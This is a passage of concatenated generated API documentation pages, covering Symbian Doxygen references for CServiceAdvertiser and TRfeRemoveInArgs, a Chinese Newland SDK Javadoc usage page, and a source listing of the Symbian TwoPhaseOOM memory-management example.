href="_service_advertiser_8h_source.html">ServiceAdvertiser.h</a>.</p> <hr/><h2>Constructor &amp; Destructor Documentation</h2> <a class="anchor" id="a2f8c410fff06231459357dadf91c300b"></a><!-- doxytag: member="CServiceAdvertiser::~CServiceAdvertiser" ref="a2f8c410fff06231459357dadf91c300b" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">CServiceAdvertiser::~CServiceAdvertiser </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p>~CDeviceDiscoverer()</p> <p>discussion Destroy the object and release all memory objects </p> <p>Definition at line <a class="el" href="_service_advertiser_8cpp_source.html#l00052">52</a> of file <a class="el" href="_service_advertiser_8cpp_source.html">ServiceAdvertiser.cpp</a>.</p> </div> </div> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="a806cb9d464c1416a6441a9aba38b203c"></a><!-- doxytag: member="CServiceAdvertiser::NewL" ref="a806cb9d464c1416a6441a9aba38b203c" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_c_service_advertiser.html">CServiceAdvertiser</a> * CServiceAdvertiser::NewL </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_service_advertiser.html#a806cb9d464c1416a6441a9aba38b203c">NewL()</a></p> <p>discussion Create new <a class="el" href="class_c_service_advertiser.html">CServiceAdvertiser</a> object return a pointer to the created instance of <a class="el" href="class_c_service_advertiser.html">CServiceAdvertiser</a> </p> <p>Definition at line <a class="el" href="_service_advertiser_8cpp_source.html#l00015">15</a> of file <a class="el" href="_service_advertiser_8cpp_source.html">ServiceAdvertiser.cpp</a>.</p> </div> </div> <a class="anchor" id="ae9caf6f124248cc0e8f93e7263894ba7"></a><!-- doxytag: member="CServiceAdvertiser::NewLC" ref="ae9caf6f124248cc0e8f93e7263894ba7" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname"><a class="el" href="class_c_service_advertiser.html">CServiceAdvertiser</a> * CServiceAdvertiser::NewLC </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td><code> [static]</code></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_service_advertiser.html#ae9caf6f124248cc0e8f93e7263894ba7">NewLC()</a> </p> <p>Definition at line <a class="el" href="_service_advertiser_8cpp_source.html#l00023">23</a> of file <a class="el" href="_service_advertiser_8cpp_source.html">ServiceAdvertiser.cpp</a>.</p> </div> </div> <a class="anchor" id="a472557c615ce3eb0a59f64bb1f6a0de1"></a><!-- doxytag: member="CServiceAdvertiser::StartAdvertiserL" ref="a472557c615ce3eb0a59f64bb1f6a0de1" args="(TInt)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CServiceAdvertiser::StartAdvertiserL </td> <td>(</td> <td class="paramtype">TInt&nbsp;</td> <td class="paramname"> <em>aChannel</em></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_service_advertiser.html#a472557c615ce3eb0a59f64bb1f6a0de1">StartAdvertiserL()</a></p> <p>discussion Starts the service advertiser.</p> <p>param aChannel the communication channel (port) the service will be advertised on. an entry for our advertisement will be added to service discovery database. </p> <p>Definition at line <a class="el" href="_service_advertiser_8cpp_source.html#l00065">65</a> of file <a class="el" href="_service_advertiser_8cpp_source.html">ServiceAdvertiser.cpp</a>.</p> </div> </div> <a class="anchor" id="a7a05532cd0a9fb44ab40f1ffa1ff1c39"></a><!-- doxytag: member="CServiceAdvertiser::StopAdvertiserL" ref="a7a05532cd0a9fb44ab40f1ffa1ff1c39" args="()" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CServiceAdvertiser::StopAdvertiserL </td> <td>(</td> <td class="paramname"></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_service_advertiser.html#a7a05532cd0a9fb44ab40f1ffa1ff1c39">StopAdvertiserL()</a></p> <p>discussion Stops the service advertiser. our entry from service discovery database will be removed. </p> <p>Definition at line <a class="el" href="_service_advertiser_8cpp_source.html#l00124">124</a> of file <a class="el" href="_service_advertiser_8cpp_source.html">ServiceAdvertiser.cpp</a>.</p> </div> </div> <a class="anchor" id="ab1c8f92e638fed6da1718268407b05eb"></a><!-- doxytag: member="CServiceAdvertiser::UpdateAvailabilityL" ref="ab1c8f92e638fed6da1718268407b05eb" args="(TBool)" --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void CServiceAdvertiser::UpdateAvailabilityL </td> <td>(</td> <td class="paramtype">TBool&nbsp;</td> <td class="paramname"> <em>aAvailable</em></td> <td>&nbsp;)&nbsp;</td> <td></td> </tr> </table> </div> <div class="memdoc"> <p><a class="el" href="class_c_service_advertiser.html#ab1c8f92e638fed6da1718268407b05eb">UpdateAvailabilityL()</a></p> <p>discussion Updates the availability of advertised service. the service record in service discovery database will be updated accordingly.</p> <p>param aAvailable true if the service should be set as available, false if unavailable. </p> <p>Definition at line <a class="el" href="_service_advertiser_8cpp_source.html#l00144">144</a> of file <a class="el" href="_service_advertiser_8cpp_source.html">ServiceAdvertiser.cpp</a>.</p> </div> </div> </div> <hr size="1"/><address style="text-align: right;"><small>Generated by&nbsp; <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.6.2 </small></address> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
QuickConnectPay/apidocs/com/newland/me/cmd/pininput/class-use/CmdLoadWorkingKeyAndVerify.html
yc654084303/QuickConnQuickConnect
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_65) on Thu Jan 15 14:03:17 CST 2015 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> 类 com.newland.me.cmd.pininput.CmdLoadWorkingKeyAndVerify 的使用 (Newland ME Series SDK 1.1.6 API) </TITLE> <META NAME="date" CONTENT="2015-01-15"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="\u7C7B com.newland.me.cmd.pininput.CmdLoadWorkingKeyAndVerify \u7684\u4F7F\u7528 (Newland ME Series SDK 1.1.6 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="跳过导航链接"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>概述</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>软件包</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../com/newland/me/cmd/pininput/CmdLoadWorkingKeyAndVerify.html" title="com.newland.me.cmd.pininput 中的类"><FONT CLASS="NavBarFont1"><B>类</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>使用</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>树</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>已过时</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>索引</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>帮助</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;上一个&nbsp; &nbsp;下一个</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?com/newland/me/cmd/pininput//class-useCmdLoadWorkingKeyAndVerify.html" target="_top"><B>框架</B></A> &nbsp; &nbsp;<A HREF="CmdLoadWorkingKeyAndVerify.html" target="_top"><B>无框架</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>类 com.newland.me.cmd.pininput.CmdLoadWorkingKeyAndVerify<br>的使用</B></H2> </CENTER> 没有 com.newland.me.cmd.pininput.CmdLoadWorkingKeyAndVerify 的用法 <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="跳过导航链接"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>概述</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>软件包</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../com/newland/me/cmd/pininput/CmdLoadWorkingKeyAndVerify.html" title="com.newland.me.cmd.pininput 中的类"><FONT CLASS="NavBarFont1"><B>类</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>使用</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>树</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>已过时</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>索引</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>帮助</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;上一个&nbsp; &nbsp;下一个</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?com/newland/me/cmd/pininput//class-useCmdLoadWorkingKeyAndVerify.html" target="_top"><B>框架</B></A> &nbsp; &nbsp;<A HREF="CmdLoadWorkingKeyAndVerify.html" target="_top"><B>无框架</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>所有类</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2013-2015 <a href="http://www.newlandcomputer.com">NewLandComputer</a>. All Rights Reserved. </BODY> </HTML>
pdk/GUID-03083CE1-F945-36A6-9FFD-CB78FEE71908.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxClass"/> <meta name="DC.Title" content="TRfeRemoveInArgs"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-03083CE1-F945-36A6-9FFD-CB78FEE71908"/> <title>TRfeRemoveInArgs</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-03083CE1-F945-36A6-9FFD-CB78FEE71908"><a name="GUID-03083CE1-F945-36A6-9FFD-CB78FEE71908"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2366708 id2459895 id2459900 id2459998 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">TRfeRemoveInArgs Class Reference</h1> <table class="signature"><tr><td>class TRfeRemoveInArgs : public TRfeInArgs</td></tr></table><div class="section"></div> <div class="section derivation"><h2 class="sectiontitle">Inherits from</h2><ul class="derivation derivation-root"><li class="derivation-depth-0 ">TRfeRemoveInArgs<ul class="derivation"><li class="derivation-depth-1 "><a href="GUID-4A4F60D0-0AE4-3A1F-A437-D0FE7AD67207.html">TRfeInArgs</a></li></ul></li></ul></div> <div class="section member-index"><table border="0" class="member-index"><thead><tr><th colspan="2">Public Attributes</th></tr></thead><tbody><tr><td align="right" valign="top"> <a href="GUID-0B9C8884-6BFF-35E2-AA6F-E4057B85AFCF.html">TFileName</a> </td><td><a href="#GUID-9526E874-AC25-3C6B-86AD-9150C87215F8">iName</a></td></tr></tbody></table><table border="0" class="member-index"><thead><tr><th colspan="2">Inherited Attributes</th></tr></thead><tbody><tr><td> </td><td><a href="GUID-4A4F60D0-0AE4-3A1F-A437-D0FE7AD67207.html">TRfeInArgs::iFid</a></td></tr><tr class="bg"><td> </td><td><a href="GUID-4A4F60D0-0AE4-3A1F-A437-D0FE7AD67207.html">TRfeInArgs::iOpCode</a></td></tr></tbody></table></div><h1 class="pageHeading topictitle1">Member Data Documentation</h1><div class="nested1" id="GUID-9526E874-AC25-3C6B-86AD-9150C87215F8"><a name="GUID-9526E874-AC25-3C6B-86AD-9150C87215F8"><!-- --></a> <h2 class="topictitle2"> TFileName iName</h2> <table class="signature"><tr><td> <a href="GUID-0B9C8884-6BFF-35E2-AA6F-E4057B85AFCF.html">TFileName</a> </td><td>iName</td></tr></table><div class="section"></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/guid-6013a680-57f9-415b-8851-c4fa63356636/_two_phase_o_o_m_8cpp_source.html
warlordh/fork_Symbian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>TB9.2 Example Applications: examples/Base/MemMan/Cleanup/TwoPhaseOOM/TwoPhaseOOM.cpp Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> <link type="text/css" rel="stylesheet" href="../css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="../css/sdl.css" media="screen"/> <!--[if IE]> <link href="../css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> </head> <body class="kernelguide"> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Product Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <!-- Generated by Doxygen 1.6.2 --> <h1>examples/Base/MemMan/Cleanup/TwoPhaseOOM/TwoPhaseOOM.cpp</h1><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">// Copyright (c) 2000-2009 Nokia Corporation and/or its subsidiary(-ies).</span> <a name="l00002"></a>00002 <span class="comment">// All rights reserved.</span> <a name="l00003"></a>00003 <span class="comment">// This component and the accompanying materials are made available</span> <a name="l00004"></a>00004 <span class="comment">// under the terms of &quot;Eclipse Public License v1.0&quot;</span> <a name="l00005"></a>00005 <span class="comment">// which accompanies this distribution, and is available</span> <a name="l00006"></a>00006 <span class="comment">// at the URL &quot;http://www.eclipse.org/legal/epl-v10.html&quot;.</span> <a name="l00007"></a>00007 <span class="comment">//</span> <a name="l00008"></a>00008 <span class="comment">// Initial Contributors:</span> <a name="l00009"></a>00009 <span class="comment">// Nokia Corporation - initial contribution.</span> <a name="l00010"></a>00010 <span class="comment">//</span> <a name="l00011"></a>00011 <span class="comment">// Contributors:</span> <a name="l00012"></a>00012 <span class="comment">//</span> <a name="l00013"></a>00013 <span class="comment">// Description:</span> <a name="l00014"></a>00014 <span class="comment">// NOTE: the structure of this example is different to standard E32 examples</span> <a name="l00015"></a>00015 <span class="comment">//</span> <a name="l00016"></a>00016 <a name="l00017"></a>00017 <a name="l00018"></a>00018 <span class="preprocessor">#include &lt;e32cons.h&gt;</span> <a name="l00019"></a>00019 <a name="l00020"></a>00020 <span class="comment">// All messages written to this</span> <a name="l00021"></a>00021 LOCAL_D CConsoleBase* console; <a name="l00022"></a>00022 <a name="l00023"></a>00023 <span class="comment">// Function prototypes</span> <a name="l00024"></a>00024 LOCAL_C <span class="keywordtype">void</span> doExampleL(); <a name="l00025"></a>00025 LOCAL_C <span class="keywordtype">void</span> callExampleL(); <a name="l00026"></a>00026 <a name="l00027"></a>00027 <a name="l00029"></a>00029 <span class="comment">//</span> <a name="l00030"></a>00030 <span class="comment">// -----&gt; CSimple (definition)</span> <a name="l00031"></a>00031 <span class="comment">//</span> <a name="l00033"></a>00033 <span class="comment"></span><span class="keyword">class </span>CSimple : <span class="keyword">public</span> CBase <a name="l00034"></a>00034 { <a name="l00035"></a>00035 <span class="keyword">public</span> : <a name="l00036"></a>00036 <span class="keyword">static</span> CSimple* NewL(TInt aVal); <a name="l00037"></a>00037 <span class="keyword">static</span> CSimple* NewLC(TInt aVal); <a name="l00038"></a>00038 <span class="keywordtype">void</span> Display(); <a name="l00039"></a>00039 <span class="keyword">protected</span>: <a name="l00040"></a>00040 CSimple(TInt aVal); <a name="l00041"></a>00041 <span class="keyword">public</span>: <a name="l00042"></a>00042 TInt iVal; <a name="l00043"></a>00043 }; <a name="l00044"></a>00044 <a name="l00045"></a>00045 <a name="l00047"></a>00047 <span class="comment">//</span> <a name="l00048"></a>00048 <span class="comment">// -----&gt; CCompound (definition)</span> <a name="l00049"></a>00049 <span class="comment">//</span> <a name="l00051"></a>00051 <span class="comment"></span><span class="keyword">class </span>CCompound : <span class="keyword">public</span> CBase <a name="l00052"></a>00052 { <a name="l00053"></a>00053 <span class="keyword">public</span> : <a name="l00054"></a>00054 <span class="keyword">virtual</span> ~CCompound(); <a name="l00055"></a>00055 <span class="keywordtype">void</span> Display(); <a name="l00056"></a>00056 <span class="keyword">static</span> CCompound* NewL(TInt aRoot,TInt aChild); <a name="l00057"></a>00057 <span class="keyword">static</span> CCompound* NewLC(TInt aRoot,TInt aChild); <a name="l00058"></a>00058 <span class="keyword">private</span>: <a name="l00059"></a>00059 <span class="keywordtype">void</span> ConstructL(TInt aRoot,TInt aChild); <a name="l00060"></a>00060 <span class="keyword">private</span>: <a name="l00061"></a>00061 TInt iRoot; <a name="l00062"></a>00062 CSimple* iChild; <a name="l00063"></a>00063 }; <a name="l00064"></a>00064 <a name="l00066"></a>00066 <span class="comment">//</span> <a name="l00067"></a>00067 <span class="comment">// -----&gt; CCompound (implementation)</span> <a name="l00068"></a>00068 <span class="comment">//</span> <a name="l00070"></a>00070 <span class="comment"></span> <a name="l00071"></a>00071 <span class="comment">// Use two stage construction technique to </span> <a name="l00072"></a>00072 <span class="comment">// prevent alloc heaven.</span> <a name="l00073"></a>00073 <span class="comment">// NB. due to use of cleanup stack, NewLC is</span> <a name="l00074"></a>00074 <span class="comment">// now the primitive, rather than NewL</span> <a name="l00075"></a>00075 <a name="l00076"></a>00076 <span class="comment">// NewLC with two stage construct</span> <a name="l00077"></a>00077 CCompound* CCompound::NewLC(TInt aRoot,TInt aChild) <a name="l00078"></a>00078 { <span class="comment">// get new, leave if can&#39;t </span> <a name="l00079"></a>00079 CCompound* <span class="keyword">self</span>=<span class="keyword">new</span> (ELeave) CCompound; <a name="l00080"></a>00080 CleanupStack::PushL(<span class="keyword">self</span>); <a name="l00081"></a>00081 <span class="comment">// push onto cleanup stack (in </span> <a name="l00082"></a>00082 <span class="comment">// case self-&gt;ConstructL leaves).</span> <a name="l00083"></a>00083 <span class="comment">// Use two-stage construct</span> <a name="l00084"></a>00084 <span class="keyword">self</span>-&gt;ConstructL(aRoot,aChild); <a name="l00085"></a>00085 <span class="keywordflow">return</span> <span class="keyword">self</span>; <a name="l00086"></a>00086 } <a name="l00087"></a>00087 <span class="comment">// version of NewLC which leaves </span> <a name="l00088"></a>00088 <span class="comment">// nothing on the cleanup stack</span> <a name="l00089"></a>00089 CCompound* CCompound::NewL(TInt aRoot,TInt aChild) <a name="l00090"></a>00090 { <a name="l00091"></a>00091 CCompound* <span class="keyword">self</span>=NewLC(aRoot,aChild); <a name="l00092"></a>00092 CleanupStack::Pop(); <a name="l00093"></a>00093 <span class="keywordflow">return</span> <span class="keyword">self</span>; <a name="l00094"></a>00094 } <a name="l00095"></a>00095 <span class="comment">// NB. function may leave, </span> <a name="l00096"></a>00096 <span class="comment">// as CSimple::NewL may leave</span> <a name="l00097"></a>00097 <span class="keywordtype">void</span> CCompound::ConstructL(TInt aRoot,TInt aChild) <a name="l00098"></a>00098 { <a name="l00099"></a>00099 iRoot = aRoot; <a name="l00100"></a>00100 iChild = CSimple::NewL(aChild); <a name="l00101"></a>00101 iChild-&gt;iVal = aChild; <a name="l00102"></a>00102 } <a name="l00103"></a>00103 <a name="l00104"></a>00104 <span class="keywordtype">void</span> CCompound::Display() <a name="l00105"></a>00105 { <a name="l00106"></a>00106 <span class="comment">// Display class member data on the console</span> <a name="l00107"></a>00107 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KFormat4,<span class="stringliteral">&quot;Root=%d. Child=%d.\n&quot;</span>); <a name="l00108"></a>00108 console-&gt;Printf(KFormat4,iRoot,iChild-&gt;iVal); <a name="l00109"></a>00109 } <a name="l00110"></a>00110 <a name="l00111"></a>00111 CCompound::~CCompound() <a name="l00112"></a>00112 { <a name="l00113"></a>00113 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KMsgDestCCompound,<span class="stringliteral">&quot;Destructing CCompound\n&quot;</span>); <a name="l00114"></a>00114 console-&gt;Printf(KMsgDestCCompound); <a name="l00115"></a>00115 <span class="keyword">delete</span> iChild; <a name="l00116"></a>00116 } <a name="l00117"></a>00117 <a name="l00118"></a>00118 <a name="l00120"></a>00120 <span class="comment">//</span> <a name="l00121"></a>00121 <span class="comment">// -----&gt; CSimple (implementation)</span> <a name="l00122"></a>00122 <span class="comment">//</span> <a name="l00124"></a>00124 <span class="comment"></span>CSimple* CSimple::NewL(TInt aVal) <a name="l00125"></a>00125 { <a name="l00126"></a>00126 <span class="comment">// NB The NewL function uses the C++ constructor mechanism.</span> <a name="l00127"></a>00127 CSimple* <span class="keyword">self</span>=<span class="keyword">new</span> (ELeave) CSimple(aVal); <a name="l00128"></a>00128 <span class="keywordflow">return</span> <span class="keyword">self</span>; <a name="l00129"></a>00129 } <a name="l00130"></a>00130 <a name="l00131"></a>00131 <a name="l00132"></a>00132 CSimple* CSimple::NewLC(TInt aVal) <a name="l00133"></a>00133 { <a name="l00134"></a>00134 <span class="comment">// NewLC is enriched with a push to the cleanup stack</span> <a name="l00135"></a>00135 CSimple* <span class="keyword">self</span>=NewL(aVal); <a name="l00136"></a>00136 CleanupStack::PushL(<span class="keyword">self</span>); <a name="l00137"></a>00137 <span class="keywordflow">return</span> <span class="keyword">self</span>; <a name="l00138"></a>00138 } <a name="l00139"></a>00139 <a name="l00140"></a>00140 <a name="l00141"></a>00141 <span class="keywordtype">void</span> CSimple::Display() <a name="l00142"></a>00142 { <a name="l00143"></a>00143 <span class="comment">// Display class data member on the console.</span> <a name="l00144"></a>00144 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KFormat1,<span class="stringliteral">&quot;Value=%d.\n&quot;</span>); <a name="l00145"></a>00145 console-&gt;Printf(KFormat1,iVal); <a name="l00146"></a>00146 } <a name="l00147"></a>00147 <a name="l00148"></a>00148 CSimple::CSimple(TInt aVal) <a name="l00149"></a>00149 : iVal(aVal) <a name="l00150"></a>00150 {} <a name="l00151"></a>00151 <a name="l00152"></a>00152 <a name="l00154"></a>00154 <span class="comment">//</span> <a name="l00155"></a>00155 <span class="comment">// Main function called by E32</span> <a name="l00156"></a>00156 <span class="comment">//</span> <a name="l00158"></a>00158 <span class="comment"></span>GLDEF_C TInt E32Main() <a name="l00159"></a>00159 { <a name="l00160"></a>00160 <span class="comment">// Get cleanup stack</span> <a name="l00161"></a>00161 CTrapCleanup* cleanup=CTrapCleanup::New(); <a name="l00162"></a>00162 <a name="l00163"></a>00163 <span class="comment">// Some more initialization, then do the example</span> <a name="l00164"></a>00164 TRAPD(error,callExampleL()); <a name="l00165"></a>00165 <a name="l00166"></a>00166 <span class="comment">// callExampleL() should never leave.</span> <a name="l00167"></a>00167 <a class="code" href="secureclientandserver_8h.html#a5eadd4429627d82193b37536d4faa03a">_LIT</a>(KMsgPanicEpoc32ex,<span class="stringliteral">&quot;EPOC32EX&quot;</span>); <a name="l00168"></a>00168 __ASSERT_ALWAYS(!error,User::Panic(KMsgPanicEpoc32ex,error)); <a name="l00169"></a>00169 <a name="l00170"></a>00170 <span class="comment">// destroy the cleanup stack</span> <a name="l00171"></a>00171 <span class="keyword">delete</span> cleanup; <a name="l00172"></a>00172 <a name="l00173"></a>00173 <span class="comment">// return</span> <a name="l00174"></a>00174 <span class="keywordflow">return</span> 0; <a name="l00175"></a>00175 } <a name="l00176"></a>00176 <a name="l00177"></a>00177 <a name="l00179"></a>00179 <span class="comment">//</span> <a name="l00180"></a>00180 <span class="comment">//</span> <a name="l00181"></a>00181 <span class="comment">//</span> <a name="l00183"></a>00183 <span class="comment"></span>LOCAL_C <span class="keywordtype">void</span> callExampleL() <a 